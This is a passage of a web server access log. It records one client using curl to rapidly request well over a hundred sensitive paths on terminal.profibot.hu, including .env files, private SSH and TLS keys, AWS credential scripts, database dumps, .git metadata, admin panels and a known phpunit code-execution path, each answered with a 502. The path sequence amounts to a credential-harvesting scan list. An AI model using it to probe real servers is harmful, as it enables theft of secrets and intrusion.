web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.inc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.properties" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/appsettings.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/connectionstrings.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/settings.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/settings.php.old" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/settings.php.save" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/app/config/parameters.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/composer.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/package.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/debug.xml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/debug-output.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/php.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/build.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/symfony/_profiler/phpinfo" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/webdav/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/php-information" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/tools/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/start.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/run.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/build.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/startup.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/cron.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/aws-credentials.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/configure.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/service.pwd" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/service.grp" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/server.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/configuration.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/app/etc/local.xml.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/database.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/mysql.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:47 +0000] - - 502 - GET https terminal.profibot.hu "/backup.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/site.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/server-status/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/server-info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/app_dev.php/_profiler/open?file=app/config/parameters.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/storage/oauth-private.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/storage/oauth-public.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/storage/logs/stack.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/storage/debug.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/bootstrap/app.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/config/auth.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/config/filesystems.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/config/queue.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/config/session.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/config/view.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/config/logging.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/config/broadcasting.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/resources/views/errors/500.blade.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/resources/views/errors/404.blade.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/resources/views/welcome.blade.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/_debugbar/open" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/debugbar" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/xdebug.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/xdebug_info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/symfony/debug/debug.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/composer/installed.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/autoload.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/.env.example" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/artisan" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/test_socket.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:48 +0000] - - 502 - GET https terminal.profibot.hu "/testdb.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/errors.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/config.old" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/export.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/adminer-4.2.5-mysql-en.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/phpmyadmin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/phpmyadmin/index.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/phpmyadmin/setup/index.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/sql.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/sqladmin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/dbadmin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/phpminiadmin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/mysqladmin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/backup/database.zip" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/database.zip" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/dump.tar.gz" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/data.tar.gz" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/backup.tar" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/app.tar.gz" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/database.tar.gz" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/db_backup.zip" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/database_backup.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/.config/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/.docker/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/.settings.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/node_modules/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/core/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/core/config.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/api/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config-sample.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:49 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress/wp-config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress/wp-config-sample.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.git/HEAD" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.svn/entries" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.hg/hgrc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.DS_Store" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.htpasswd" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.bash_history" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.bashrc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/id_rsa" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/id_rsa.pub" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/key.pem" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/public.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/ssl.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/cert.pem" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/selfsigned.crt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/selfsigned.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/nginx.conf" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/httpd.conf" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/docker-compose.override.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/Dockerfile" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.nvmrc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.yarnrc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/.rbenv-vars" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/config.ts" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/env.ts" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/settings.ini" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/web.xml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/WEB-INF/web.xml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/META-INF/context.xml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/admin/settings.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/admin/settings.ini" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:50 +0000] - - 502 - GET https terminal.profibot.hu "/admin/db.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/admin/db.conf" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/admin/sql.conf" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/admin/.env.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/admin/adminer.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/admin/sqladmin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/admin/phpmyadmin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/private/secret.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/private/secret.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/secret.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/api/secrets.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/credentials.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/install.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/setup.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/setup-config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:51 +0000] - - 502 - GET https terminal.profibot.hu "/configuration.bak" [Client 